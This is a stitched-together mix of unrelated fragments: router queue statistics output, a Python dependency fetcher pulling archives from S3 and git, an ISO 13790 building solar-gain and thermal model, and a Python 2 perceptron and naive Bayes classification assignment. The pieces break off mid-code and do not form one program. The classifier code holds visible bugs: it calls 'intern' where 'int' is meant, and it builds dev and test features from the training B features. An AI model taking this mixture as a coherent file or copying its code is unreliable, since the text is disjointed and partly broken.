max_qos : 0 , max_dflt: 0
share : 1
plevel : 0, priority: 65535
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 46447411 , (packets): 670805
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Queue specifics:
Index 1 (Queue ID:0x8a, Name: i2l_if_3_cpp_0_prio1)
Software Control Info:
(cache) queue id: 0x0000008a, wred: 0x88b168c2, qlimit (bytes): 3125056
parent_sid: 0x264, debug_name: i2l_if_3_cpp_0_prio1
sw_flags: 0x18000001, sw_state: 0x00000c01, port_uidb: 245757
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 0
plevel : 1, priority: 0
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 269658370 , (packets): 1424992
queue_depth (bytes): 0
| |
import os
import tarfile
import zipfile
import re
import requests
import platform
import subprocess
import json
import shutil
import io
import tempfile
from default_platform import default_platform
import deps_cross_checker
import aws
# Master table of dependency types.
# A dependency definition can specify 'type' to inherit definitions from one of these.
# String values can depend on other string values from the dependency. For example,
# if 'name' is defined as 'Example' then '${name}.exe' will expand to 'Example.exe'.
# It does not matter which order the values are defined.
# String values can also depend on boolean values. For example, the string
# '${test-value?yes-result:no-result}' will get the value of the string named
# 'yes-result' if 'test-value' is a true boolean value, and the string named
# 'no-result' if 'test-value' is a false boolean value.
# Finally, string values can also depend on a lookup table defined as a JSON object.
# For example, given these definitions:
# {
# "servertable":{
# "Windows":"windows.openhome.org",
# "Linux":"linux.openhome.org",
# "*":"openhome.org"
# },
# "server":"${servertable[$system]}"
# }
# If 'system' is defined as 'Windows', then 'server' will be defined as
# 'windows.openhome.org'. The '*' entry is the default: if a lookup fails the default
# will be used instead.
# The principle string values that must be defined are 'archive-path' to point to the
# .tar.gz file with the dependency's binaries, 'dest' to specify where to untar it,
# and 'configure-args' to specify the list of arguments to pass to waf.
# In order for source control fetching to work, the string 'source-git' should point
# to the git repo and 'tag' should identify the git tag that corresponds to the
# fetched binaries.
DEPENDENCY_TYPES = {
# Ignore dependencies
# - ignored - effectively 'comments' out entire dependency
'ignore': {
'ignore': True
},
# Openhome dependencies
# - (legacy name - basically means that they are publicly visible and available)
# - generally have an associated git repo to allow us to fetch source code.
# - stored on AWS in the linn-artifacts-public bucket
#
# At a minimum must define:
# name
# version
'openhome': {
'archive-extension': '.tar.gz',
'archive-prefix': '',
'archive-suffix': '',
'binary-repo': 's3://linn-artifacts-public/artifacts',
'archive-directory': '${binary-repo}/${name}/',
'archive-filename': '${archive-prefix}${name}-${version}-${archive-platform}${archive-suffix}${archive-extension}',
'remote-archive-path': '${archive-directory}${archive-filename}',
'use-local-archive': False,
'archive-path': '${use-local-archive?local-archive-path:remote-archive-path}',
'source-path': '${<EMAIL>:/home/git',
'repo-name': '${name}',
'source-git': '${source-path}/${repo-name}.git',
'tag': '${repo-name}_${version}',
'any-platform': 'AnyPlatform',
'platform-specific': True,
'host-platform': default_platform(),
'archive-platform': '${platform-specific?platform:any-platform}',
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
# Internal dependencies
# - ony visible and available inside Linn
# - stored on AWS in the linn-artifacts-private bucket
#
# At a minimum must define:
# name
# version
'internal': {
'binary-repo': 's3://linn-artifacts-private',
'source-git': None,
'any-platform': 'AnyPlatform',
'platform-specific': True,
'archive-suffix': '',
'archive-filename': '${name}-${version}-${platform}${archive-suffix}.tar.gz',
'archive-platform': '${platform-specific?platform:any-platform}',
'archive-path': '${binary-repo}/${name}/${archive-filename}',
'host-platform': default_platform(),
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
# External dependencies
#
# - publicly visible and available
# - no git repo that conforms to 'openhome standard'
# - stored on AWS in the linn-artifacts-public bucket
#
# At a minimum must define:
# name
# archive-filename
'external': {
'binary-repo': 's3://linn-artifacts-public/artifacts',
'source-git': None,
'any-platform': 'AnyPlatform',
'platform-specific': True,
'archive-platform': '${platform-specific?platform:any-platform}',
'archive-path': '${binary-repo}/${archive-platform}/${archive-filename}',
'host-platform': default_platform(),
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
}
class FileFetcher(object):
def __init__(self):
pass
def fetch(self, path):
if path.startswith("file:") or path.startswith("smb:"):
raise Exception("FETCH: File URLs deprecated")
elif path.startswith("s3:"):
return self.fetch_aws(path)
elif re.match(r"[^\W\d]{2,8}:", path):
raise Exception("FETCH: Legacy URLs no longer re-routed")
return self.fetch_local(path)
@staticmethod
def fetch_aws(awspath):
print(' from AWS %s' % awspath)
temppath = tempfile.mktemp( suffix='.tmp' )
try:
aws.copy(awspath, temppath)
return temppath
except:
raise Exception("FETCH: Unable to retrieve %s from AWS" % awspath)
return None
@staticmethod
def fetch_local(path):
print( ' from LOCAL PATH %s' % path)
return path
class EnvironmentExpander(object):
# template_regex matches
template_regex = re.compile(r"""
(?x) # Enable whitespace and comments
(?P<dollar>\$\$)| # Match $$
(?P<word>\$[a-zA-Z_][a-zA-Z_0-9]*)| # Match $word
(?P<parens>\$\{[^}]*\}) # Match ${any-thing}
""")
# Matches foo[bar]
index_regex = re.compile(r"""
(?x) # Enable whitespace and comments
^ # Match only at start of string
([^][]*) # Match table name (no brackets allowed)
\[ # Match one open bracket: [
([^][]*) # Match key (no brackets allowed)
\] # Match one close bracket: ]
$
""")
def __init__(self, env_dict):
self.env_dict = env_dict
self.cache = {}
self.expandset = set()
def __getitem__(self, key):
return self.expand(key)
def getraw(self, key):
return self.env_dict[key]
def __contains__(self, key):
return key in self.env_dict
def keys(self):
return self.env_dict.keys()
def values(self):
return [self.expand(key) for key in self.keys()]
def items(self):
return [(key, self.expand(key)) for key in self.keys()]
def expand(self, key):
if key in self.cache:
return self.cache[key]
if key in self.expandset:
raise ValueError("Recursive expansion for key:", key)
self.expandset.add(key)
result = self._expand(key)
self.cache[key] = result
self.expandset.remove(key)
return result
def _expand(self, key):
if key not in self.env_dict:
raise KeyError("Key undefined:", key)
value = self.env_dict[key]
return self._expandvalue(value)
def _expandvalue(self, value):
if isinstance(value, ("".__class__, u"".__class__)):
return self.expandstring(value)
# return self.template_regex.sub(self.replacematch, value)
elif isinstance(value, (list, tuple)):
return [self._expandvalue(x) for x in value]
elif isinstance(value, dict):
return dict((k, self._expandvalue(v)) for (k, v) in value.items())
return value
def expandstring(self, value):
firstmatch = self.template_regex.match(value)
if firstmatch is not None and firstmatch.group(0) == value and value != "$$":
# Special case: The entire string is a single expansion. In this case,
# we allow the expansion to be *anything* (bool, int, list...),
# not just a string.
return self.replacematch(firstmatch)
return self.template_regex.sub(self.replacematch, value)
def replacematch(self, match):
if match.group('dollar'):
return '$'
key = None
if match.group('word'):
key = match.group('word')[1:]
if match.group('parens'):
key = match.group('parens')[2:-1]
assert key is not None
key = key.strip()
if '[' in key:
return self.expandlookup(key)
if '?' in key:
return self.expandconditional(key)
return self.expand(key)
def expandlookup(self, key):
match = self.index_regex.match(key)
if match is None:
raise ValueError('lookup must be of form ${table[key]}')
tablename = match.group(1).strip()
keyname = match.group(2).strip()
table = self.expand(tablename)
if keyname.startswith('$'):
key = self.expand(keyname[1:])
else:
key = keyname
if not isinstance(table, dict):
raise ValueError("lookup table must expand to a JSON object (got {0!r} instead)".format(table))
if not isinstance(key, ("".__class__, u"".__class__)):
raise ValueError("lookup index must expand to a JSON string (got {0!r} instead)".format(key))
if key not in table:
if '*' in table:
return table['*']
raise KeyError("Key not in table, and no default '*' entry found: key={0!r}\ntable={1!r}".format(key, table))
return table[key]
def expandconditional(self, key):
if '?' not in key:
raise ValueError('conditional must be of form ${condition?result:alternative}')
condition, rest = key.split('?', 1)
if ':' not in rest:
raise ValueError('conditional must be of form ${condition?result:alternative}')
primary, alternative = rest.split(':', 1)
condition, primary, alternative = [x.strip() for x in [condition, primary, alternative]]
try:
conditionvalue = self.expand(condition)
except KeyError:
conditionvalue = False
if self.is_trueish(conditionvalue):
return self.expand(primary)
return self.expand(alternative)
@staticmethod
def is_trueish(value):
if hasattr(value, "upper"):
value = value.upper()
return value in [1, "1", "YES", "Y", "TRUE", "ON", True]
class Dependency(object):
def __init__(self, name, environment, fetcher, has_overrides=False):
self.expander = EnvironmentExpander(environment)
self.has_overrides = has_overrides
self.fetcher = fetcher
def fetch(self):
remote_path = self.expander.expand('archive-path')
local_path = os.path.abspath(self.expander.expand('dest'))
fetched_path = None
print("\nFetching '%s'" % self.name)
try:
fetched_path = self.fetcher.fetch(remote_path)
statinfo = os.stat(fetched_path)
if not statinfo.st_size:
os.unlink(fetched_path)
print(" **** WARNING - failed to fetch %s ****" % os.path.basename(remote_path))
return False
except IOError:
print(" **** FAILED ****")
return False
try:
os.makedirs(local_path)
except OSError:
# We get an error if the directory exists, which we are happy to
# ignore. If something worse went wrong, we will find out very
# soon when we try to extract the files.
pass
print(" unpacking to '%s'" % (local_path,))
if os.path.splitext(remote_path)[1].upper() in ['.ZIP', '.NUPKG', '.JAR']:
self.unzip(fetched_path, local_path)
else:
self.untar(fetched_path, local_path)
if fetched_path:
if fetched_path != remote_path:
os.unlink(fetched_path)
print("OK")
return True
@property
def name(self):
return self['name']
def __getitem__(self, key):
return self.expander.expand(key)
def __contains__(self, key):
return key in self.expander
def items(self):
return self.expander.items()
def checkout(self):
name = self['name']
sourcegit = self['source-git']
if sourcegit is None:
print('No git repo defined for {0}'.format(name))
return False
print("Fetching source for '%s'\n into '%s'" % (name, os.path.abspath('../' + name)))
tag = self['tag']
try:
if not os.path.exists('../' + name):
print(' git clone {0} {1}'.format(sourcegit, name))
subprocess.check_call(['git', 'clone', sourcegit, name], cwd='..', shell=False)
elif not os.path.isdir('../' + name):
print('Cannot checkout {0}, because directory ../{0} already exists'.format(name))
return False
else:
print(' git fetch origin')
subprocess.check_call(['git', 'fetch', 'origin'], cwd='../' + name, shell=False)
print(" git checkout {0}".format(tag))
subprocess.check_call(['git', 'checkout', tag], cwd='../' + name, shell=False)
except subprocess.CalledProcessError as cpe:
print(str(cpe))
return False
return True
@staticmethod
def untar(source, dest):
| |
light opaque walls(W)
# - Q_dot_sh: total solar flux and infrared emission of heavy opaque walls
# - Q_dot_sd_tot: total direct solar flux through glazing
# - Q_dot_svl_tot: Solar gain due to the increase in temperature of the ventilated air cavity
#INPUTS
# - Lat: Latitude of the location (north positive) -90<Lat<90
# - Long: Longitude of the location (west positive) 0<Long<180
# - Long_st: Longitude of the standard meridian of the time zone
# - albedo: Ground albdo
# - SHGC_gl_0: Normal solar heat gain coefficient of window
# - p_SHGC: Angular dependency factor of SHGC for direct radiation
# - A_v_hopw,A_v_lopw: Vertical Opaque Walls surface area for each orientation (m)
# - A_t_gl: Vertical Windows surface area for each orientation (m)
# - n: day 1<n<365
# - h: hour 1<h<8760
# - I_glob_h: Global horizontal solar radiation
# - I_diff_h: Diffuse horizontal solar radiation
#Initialization:
# theta=zeros(1, n);
# theta_z=zeros(1, n_ori);
# gamma_s=zeros(1, n_ori);
# I_tot_w=zeros(1, n_ori);
# I_diff_w=zeros(1, n_ori);
# I_ref_w=zeros(1, n_ori);
# I_dir_w=zeros(1, n_ori);
# I_dir_n=zeros(1, n_ori);
# I_hemis_w=zeros(1, n_ori);
# I_sol_lopw=zeros(1, n_ori);
# I_sol_hopw=zeros(1, n_ori);
# Q_dot_sol_l=zeros(1, n_ori);
# Q_dot_sol_h=zeros(1, n_ori);
from numpy import zeros
from math import pi,cos
import pandas as pd
SurfaceDataFrameLabels = ['Q_dot_sol_h',
'I_diff_w',
'Q_dot_sol_gl_dir',
'SHGC_dir1',
'SHGC_dir2',
'Sp32_hemis',
'Sp31_dir',
'Sp22_hemis',
'Q_dot_sol_l',
'Q_dot_sd_hemis',
'Q_dot_svl_hemis',
'I_sol_hopw',
'I_dir_w',
'NL_ext',
'Sp11_dir',
'Sp21_dir',
'Sp22_dir',
'Sp12_dir',
'theta',
'I_dir_n',
'gamma_s',
'I_tot_w',
'I_hemis_w',
'SHGC_hemis2',
'Q_dot_svl_dir',
'SHGC1',
'SHGC2',
'Q_dot_sd_dir',
'Q_dot_IR_l',
'I_sol_lopw',
'Sp11_hemis',
'f_shad',
'Sp21_hemis',
'Sp31_hemis',
'Q_dot_sol_gl_hemis',
'SHGC_hemis1',
'Sp12_hemis',
'Sp32_dir',
'Q_dot_IR_h',
'I_ref_w',
'theta_z']
SurfaceList = [(x) for x in range(0,n_walls)]
Surface = pd.DataFrame(columns=SurfaceDataFrameLabels,index=SurfaceList)
for i in range(0,n_walls):
if I_glob_h > 0:
if (ori[i] == 'F') or (ori[i] == 'C'):
Surface.Q_dot_sol_h[i] = 0
Surface.Q_dot_sol_l[i] = 0
Surface.Q_dot_sol_gl_dir[i] = 0
Surface.Q_dot_sol_gl_hemis[i] = 0
Surface.Q_dot_sd_dir[i] = 0
Surface.Q_dot_sd_hemis[i] = 0
Surface.Q_dot_svl_dir[i] = 0
Surface.Q_dot_svl_hemis[i] = 0
Surface.I_tot_w[i] = 0
else:
Surface.theta[i], Surface.theta_z[i], Surface.gamma_s[i], Surface.I_tot_w[i], Surface.I_ref_w[i],\
Surface.I_diff_w[i], Surface.I_dir_w[i], Surface.I_dir_n[i] = \
INCIDENTRAD(Lat, Long, Long_st, albedo, n, h, I_glob_h, I_diff_h, surf_az[i], slope[i], f_low_dir[i],f_low_diff[i])
Surface.I_hemis_w[i] = Surface.I_ref_w[i] + Surface.I_diff_w[i]
#USE OF SHADINGS - Fraction of the area covered by shading system
#(vertical openings only)
if e_solshad[i] == 0:
Surface.f_shad[i] = 0
Surface.NL_ext[i] = 0
else:
Surface.f_shad[i], Surface.NL_ext[i] = SOLARSHAD(mode_solshad[i], NL_ext_max[i], Surface.I_tot_w[i])
# VERTICAL WALLS AND ROOF
#Heavy opaque vertical walls incident radiation
Surface.I_sol_hopw[i] = Surface.I_tot_w[i] #(W)
Surface.Q_dot_sol_h[i] = alpha_hopw[i] * A_v_hopw[i] * Surface.I_sol_hopw[i]
#Light opaque walls incident radiation
Surface.I_sol_lopw[i] = Surface.I_tot_w[i] #(W)
Surface.Q_dot_sol_l[i] = alpha_lopw[i] * A_v_lopw[i] * Surface.I_sol_lopw[i]
#VERTICAL AND HORIZONTAL WINDOWS
#SHGC and Light Transmittance without exterior solar shading
Surface.SHGC1[i] = SHGC_gl_0[i]
#SHGC and Light Transmittance with exterior solar shading
Surface.SHGC2[i] = IAC_solshad[i] * SHGC_gl_0[i]
#Glazed walls incident radiation
#SHGC for direct solar radiation without solar shadings
Surface.SHGC_dir1[i] = Surface.SHGC1[i] * VARSHGC(Surface.theta[i], p_SHGC)
#SHGC for hemispherical solar radiation without solar shadings
Surface.SHGC_hemis1[i] = Surface.SHGC1[i] * f_hemis
#SHGC for direct solar radiation with solar shadings
Surface.SHGC_dir2[i] = Surface.SHGC2[i] * VARSHGC(Surface.theta[i], p_SHGC)
#SHGC for hemispherical solar radiation with solar shadings
Surface.SHGC_hemis2[i] = Surface.SHGC2[i] * f_hemis
#Components of the solar factor of a window
# without solar protection
Surface.Sp11_dir[i] = f_sg11 * Surface.SHGC_dir1[i] #Assumption when no information on the glazing
Surface.Sp21_dir[i] = f_sg21 * Surface.SHGC_dir1[i]
Surface.Sp31_dir[i] = Surface.SHGC_dir1[i] - Surface.Sp11_dir[i] - Surface.Sp21_dir[i]
Surface.Sp11_hemis[i] = f_sg11 * Surface.SHGC_hemis1[i] #Assumption when no information on the glazing
Surface.Sp21_hemis[i] = f_sg21 * Surface.SHGC_hemis1[i]
Surface.Sp31_hemis[i] = Surface.SHGC_hemis1[i] - Surface.Sp11_hemis[i] - Surface.Sp21_hemis[i]
# with solar ventilated protection
Surface.Sp12_dir[i] = f_sg12 * Surface.SHGC_dir2[i]
Surface.Sp22_dir[i] = f_sg22 * Surface.SHGC_dir2[i]
Surface.Sp32_dir[i] = Surface.SHGC_dir2[i] - Surface.Sp12_dir[i] - Surface.Sp22_dir[i]
Surface.Sp12_hemis[i] = f_sg12 * Surface.SHGC_hemis2[i]
Surface.Sp22_hemis[i] = f_sg22 * Surface.SHGC_hemis2[i]
Surface.Sp32_hemis[i] = Surface.SHGC_hemis2[i] - Surface.Sp12_hemis[i] - Surface.Sp22_hemis[i]
Surface.Q_dot_sol_gl_dir[i] = A_t_gl[i] * Surface.I_dir_w[i] * ((1 - Surface.f_shad[i]) *
Surface.Sp21_dir[i] + Surface.f_shad[i]
* Surface.Sp22_dir[i])
Surface.Q_dot_sol_gl_hemis[i] = A_t_gl[i] * Surface.I_hemis_w[i] * ((1 - Surface.f_shad[i]) *
Surface.Sp21_hemis[i] + Surface.f_shad[i]
* Surface.Sp22_hemis[i])
#Direct solar gain through windows
Surface.Q_dot_sd_dir[i] = Surface.I_dir_w[i] * A_t_gl[i] * ((1 - Surface.f_shad[i]) * Surface.Sp11_dir[i]
+ Surface.f_shad[i] * Surface.Sp12_dir[i])
Surface.Q_dot_sd_hemis[i] = Surface.I_hemis_w[i] * A_t_gl[i] * ((1 - Surface.f_shad[i]) * Surface.Sp11_hemis[i]
+ Surface.f_shad[i] * Surface.Sp12_hemis[i])
#Solar gain due to the increase in temperature of the
#ventilated air cavity
Surface.Q_dot_svl_dir[i] = A_t_gl[i] * (Surface.Sp31_dir[i] * (1 - Surface.f_shad[i]) * Surface.I_dir_w[i]
+ Surface.Sp32_dir[i] * Surface.f_shad[i] * Surface.I_dir_w[i])
Surface.Q_dot_svl_hemis[i] = A_t_gl[i] * (Surface.Sp31_hemis[i] * (1 - Surface.f_shad[i]) * Surface.I_hemis_w[i]
+ Surface.Sp32_hemis[i] * Surface.f_shad[i] * Surface.I_hemis_w[i])
Q_dot_sol_h_tot = Surface.Q_dot_sol_h.sum()
Q_dot_sol_l_tot = Surface.Q_dot_sol_l.sum()
Q_dot_sol_gl_tot = Surface.Q_dot_sol_gl_dir.sum() + Surface.Q_dot_sol_gl_hemis.sum()
Q_dot_sd_tot = Surface.Q_dot_sd_dir.sum() + Surface.Q_dot_sd_hemis.sum()
Q_dot_svl_tot = Surface.Q_dot_svl_dir.sum() + Surface.Q_dot_svl_hemis.sum()
else:
# Surface.I_tot_w = zeros((1, n_walls))
Surface.I_tot_w = pd.Series([0 for x in range(0,n_walls)])
Q_dot_sol_h_tot = 0
Q_dot_sol_l_tot = 0
Q_dot_sol_gl_tot = 0
Q_dot_sd_tot = 0
Q_dot_svl_tot = 0
#INFRARED EMISSION
if (ori[i]=='F') or (ori[i]=='C'):
#light walls
#Q_dot_IR_l(ori)=(A_v_lopw(ori)*1/2*(1+cos(beta))*epsilon_ir_lopw*I_ir_h*U_lopw+A_t_gl(ori)*1/2*(1+cos(beta))*epsilon_ir_gl*I_ir_h*U_gl)/h_e_l ;
# Heavy opaque walls
#Q_dot_IR_h(ori)=A_v_hopw(ori)*epsilon_ir_hopw*I_ir_h*1/2*(1+cos(beta))*U_hopw/h_e_h;
#light walls
Surface.Q_dot_IR_l[i] = 0
# Heavy opaque walls
Surface.Q_dot_IR_h[i] = 0
else:
beta_w = slope[i] * pi / 180
#light walls
Surface.Q_dot_IR_l[i] = (A_v_lopw[i] * 1 / 2 * (1 + cos(beta_w)) * epsilon_ir_lopw[i] * I_ir_h +
A_t_gl[i] * 1/2 * (1 + cos(beta_w)) * epsilon_ir_gl[i] * I_ir_h)
# Heavy opaque walls
Surface.Q_dot_IR_h[i] = A_v_hopw[i] * epsilon_ir_hopw[i] * I_ir_h * 1 / 2 * (1 + cos(beta_w))
Q_dot_IR_l_tot = Surface.Q_dot_IR_l.sum()
Q_dot_IR_h_tot = Surface.Q_dot_IR_h.sum()
#SOLAR GAINS
Q_dot_sl_tot = Q_dot_sol_l_tot + Q_dot_sol_gl_tot - Q_dot_IR_l_tot
Q_dot_sh_tot = Q_dot_sol_h_tot - Q_dot_IR_h_tot
#Total transmitted solar radiation
I_tr_tot = (Q_dot_sol_gl_tot + Q_dot_sd_tot + Q_dot_svl_tot) / (sum(A_t_gl) + zero)
return Q_dot_sl_tot, Q_dot_sh_tot, Q_dot_sd_tot, Q_dot_svl_tot, Surface.I_tot_w, I_tr_tot, Q_dot_IR_l_tot, Q_dot_IR_h_tot, \
Q_dot_sol_l_tot, Q_dot_sol_h_tot, Q_dot_sol_gl_tot
def TEMP_OUT(error=None, zero=None, Q_dot_sl=None, Q_dot_sh=None, T_e=None, H_tr_em=None, H_tr_es=None, H_tr_ms=None,
h_e_l=None, h_e_h=None, A_lopw_t=None, A_gl_t=None, A_fr_t=None, A_hopw_t=None):
if abs(Q_dot_sl) < error:
T_es = T_e
else:
T_es = T_e + Q_dot_sl / (h_e_l * (A_lopw_t + A_gl_t + A_fr_t) + zero)
#T_es=T_e+Q_dot_sl/(H_tr_es+zero);
if abs(Q_dot_sh) < error:
T_em = T_e
else:
#T_em=T_e+Q_dot_sh/(H_tr_em+H_tr_ms+zero);
T_em = T_e + Q_dot_sh / (h_e_h * A_hopw_t + zero)
return T_es, T_em
def TEMP(zero=None, h_ci=None, h_rs=None, T_em=None, T_es=None, T_ve_sup=None, H_ve=None, H_tr_is=None, H_tr_es=None,
H_tr_ms=None, H_tr_em=None, C_m=None, Q_dot_i=None, Q_dot_s=None, Q_dot_m=None, T_m_i=None):
#ISO 13790: Determination of the air and operative temperatures for a
#given value of Q_dot_hc
H_tr_1 = 1 / (1 / (H_ve + zero) + 1 / (H_tr_is + zero))
H_tr_2 = H_tr_1 + H_tr_es
H_tr_3 = 1 / (1 / H_tr_2 + 1 / H_tr_ms + zero)
#Total mass node flow rate
Q_dot_m_tot = Q_dot_m + H_tr_em * T_em + H_tr_3 * (Q_dot_s + H_tr_es * T_es + H_tr_1 * (Q_dot_i / (H_ve + zero) +
T_ve_sup)) / H_tr_2
#Final thermal mass temperature (Euler integration method)
T_m_f = (T_m_i * (C_m / 3600 - 1 / 2 * (H_tr_3 + H_tr_em)) + Q_dot_m_tot) / (C_m / 3600 + 1 / 2 * (H_tr_3 + H_tr_em))
#Average value mass temperature
T_m = (T_m_f + T_m_i) / 2
#Central node temperature (mean of indoor air and radiant temperatures)
T_s = (H_tr_ms * T_m + Q_dot_s + H_tr_es * T_es + H_tr_1 * (T_ve_sup + Q_dot_i / (H_ve + zero))) / (H_tr_ms +
H_tr_es + H_tr_1)
#Air indoor temperature
T_i = (H_tr_is * T_s + H_ve * T_ve_sup + Q_dot_i) / (H_tr_is + H_ve + zero)
#Operative temperature
T_op = 0.5 * (1 + h_ci / h_rs) * T_s + (1 - 0.5 * (1 + h_ci / h_rs)) * T_i
#Mean radiant temperature
T_rm = 2 * T_op - T_i
return Q_dot_m_tot, T_m, T_s, T_i, T_op, T_rm, T_m_f
def HEATGAINS(f_sa=None, A_gl=None, A_t=None, A_m=None, Q_dot_sys=None, f_occ_c=None, Q_dot_occ=None, f_appl_c=None,
Q_dot_appl=None, f_light_c=None, Q_dot_light=None, f_proc_c=None, Q_dot_proc=None, Q_dot_th_recov=None,
f_h_c=None, f_c_c=None, H_tr_es=None, h_is=None, Q_dot_svl_tot=None, Q_dot_s_d_tot=None):
#Heat flow rate due to internal heat gains
#Q_dot_occ: Sensible heat flow rate from occupants
#Q_dot_appl: Sensible heat flow rate from electrical appliances
#Q_dot_light: Sensible heat flow rate from lighting
#Q_dot_proc: Sensible heat flow rate from process
#Q_dot_proc: Sensible heat flow rate from processes
#Radiative/Convective split of internal heat gains
#Radiative/Convective split of heating/cooling power
Q_dot_h = max(0, Q_dot_sys)
Q_dot_c = min(0, Q_dot_sys)
Q_dot_h_c = f_h_c * Q_dot_h
Q_dot_h_r = (1 - f_h_c) * Q_dot_h
Q_dot_c_c = f_c_c * Q_dot_c
Q_dot_c_r = (1 - f_c_c) * Q_dot_c
| |
computed as described in Slide #19 of:
## http://www.cs.umd.edu/class/fall2016/cmsc723/slides/slides_02.pdf
def get_features_for_label(instance,label,class_labels):
num_labels = len(class_labels)
num_feats = len(instance)
feats = np.zeros(len(instance)*num_labels+1)
assert len(feats[num_feats*label:num_feats*label+num_feats]) == len(instance)
feats[num_feats*label:num_feats*label+num_feats] = instance
return feats
## get the predicted label for a given instance
## the predicted label is the one with the highest dot product of theta*feature_vector
## return the predicted label, the dot product scores for all labels and the features computed for all labels for that instance
def get_predicted_label(inst,class_labels,theta):
all_labels_scores = {}
all_labels_features = {}
for lbl in class_labels:
feat_vec = get_features_for_label(inst,lbl,class_labels)
assert len(feat_vec) == len(theta)
all_labels_scores[lbl] = np.dot(feat_vec,theta)
predicted_label = max(all_labels_scores.iteritems(), key=operator.itemgetter(1))[0]
return predicted_label
## train the perceptron by iterating over the entire training dataset
## the algorithm is an implementation of the pseudocode from Slide #23 of:
## http://www.cs.umd.edu/class/fall2016/cmsc723/slides/slides_03.pdf
def train_perceptron(train_features,train_labels,class_labels,num_features):
NO_MAX_ITERATIONS = 20
np.random.seed(0)
theta = np.zeros(num_features)
print '# Training Instances:',len(train_features)
num_iterations = 0
cnt_updates_total = 0
cnt_updates_prev = 0
m = np.zeros(num_features)
print '# Total Updates / # Current Iteration Updates:'
for piter in range(NO_MAX_ITERATIONS):
shuffled_indices = np.arange(len(train_features))
np.random.shuffle(shuffled_indices)
cnt_updates_crt = 0
for i in shuffled_indices:
inst = train_features[i]
actual_label = train_labels[i]
predicted_label = get_predicted_label(inst,class_labels,theta)
if predicted_label != actual_label:
cnt_updates_total += 1
cnt_updates_crt += 1
theta = theta + get_features_for_label(inst,actual_label,class_labels) - get_features_for_label(inst,predicted_label,class_labels)
m = m + theta
num_iterations += 1
print cnt_updates_total,'/',cnt_updates_crt
if cnt_updates_crt == 0:
break
theta = m/cnt_updates_total
print '# Iterations:',piter
print '# Iterations over instances:',num_iterations
print '# Total Updates:',cnt_updates_total
return theta
## return the predictions of the perceptron on a test set
def test_perceptron(theta,test_features,test_labels,class_labels):
predictions = []
for inst in test_features:
predicted_label = get_predicted_label(inst,class_labels,theta)
predictions.append(predicted_label)
return predictions
"""
Trains a perceptron model with bag of words features and computes the accuracy on the test set
train_texts, train_targets, train_labels are as described in read_dataset above
The same thing applies to the reset of the parameters.
"""
def run_bow_perceptron_classifier(train_texts, train_targets,train_labels,
dev_texts, dev_targets,dev_labels, test_texts, test_targets, test_labels):
all_words_idx = extract_all_words(train_texts)
all_labels_idx = extract_all_labels(train_labels)
num_features = len(all_words_idx.keys())*len(all_labels_idx.keys())+1
class_labels = all_labels_idx.values()
train_features = extract_features(all_words_idx,all_labels_idx,train_texts)
train_labels = map(lambda e: all_labels_idx[e],train_labels)
test_features = extract_features(all_words_idx,all_labels_idx,test_texts)
test_labels = map(lambda e: all_labels_idx[e],test_labels)
for l in class_labels:
inst = train_features[0]
ffl = get_features_for_label(inst,l,class_labels)
assert False not in (inst == ffl[l*len(inst):(l+1)*len(inst)])
theta = train_perceptron(train_features,train_labels,class_labels,num_features)
test_predictions = test_perceptron(theta,test_features,test_labels,class_labels)
eval_test = eval_performance(test_labels,test_predictions)
inverse_labels_index = {}
for k in all_labels_idx.keys():
inverse_labels_index[all_labels_idx[k]] = k
test_predictions_names = map(lambda e: inverse_labels_index[e],test_predictions)
with open('q3p3.txt', 'wb') as file_output:
for each_label in test_predictions_names:
file_output.write(each_label+'\n')
return ('test-micro=%d%%, test-macro=%d%%' % (int(eval_test[0]*100),int(eval_test[1]*100)))
"""
Trains a naive bayes model with bag of words features + two additional features
and computes the accuracy on the test set
train_texts, train_targets, train_labels are as described in read_dataset above
The same thing applies to the reset of the parameters.
"""
def run_extended_bow_naivebayes_classifier(train_texts, train_targets,train_labels,
dev_texts, dev_targets,dev_labels, test_texts, test_targets, test_labels):
# control variables
improved = True
alpha = 0.04
silent = True
RUN_EXP = 'Both' # set to 'B', None, or 'Both'
# feature extensions (A)
if 'A' in RUN_EXP:
train_features, dev_features, test_features = get_feature_A(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(float(train_features[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(float(dev_features[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(float(test_features[idx])))
# feature extensions (B)
elif 'B' in RUN_EXP:
train_features, dev_features, test_features = get_feature_B(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(int(train_features[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(int(dev_features[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(int(test_features[idx])))
# feature extensions with both two A and B
elif 'Both' in RUN_EXP:
train_features_A, dev_features_A, test_features_A = get_feature_A(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
train_features_B, dev_features_B, test_features_B = get_feature_B(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(float(train_features_A[idx])))
each_text.append(str(int(train_features_B[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(float(dev_features_A[idx])))
each_text.append(str(intern(train_features_B[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(float(test_features_A[idx])))
each_text.append(str(int(train_features_B[idx])))
else:
train_features, dev_features, test_features = None, None, None
if not silent:
print ' extension of the Naive Bayes classifier w. feature set: [%s] ' % (RUN_EXP)
print '------------------------------------------------------------------------------------------'
# Part 2.1 (c_s/c_sw)
c_s = dict.fromkeys(set(train_labels), 0)
multiples = list(itertools.product(c_s.keys(), ['time', 'loss', 'export']))
c_sw = dict.fromkeys(multiples, 0)
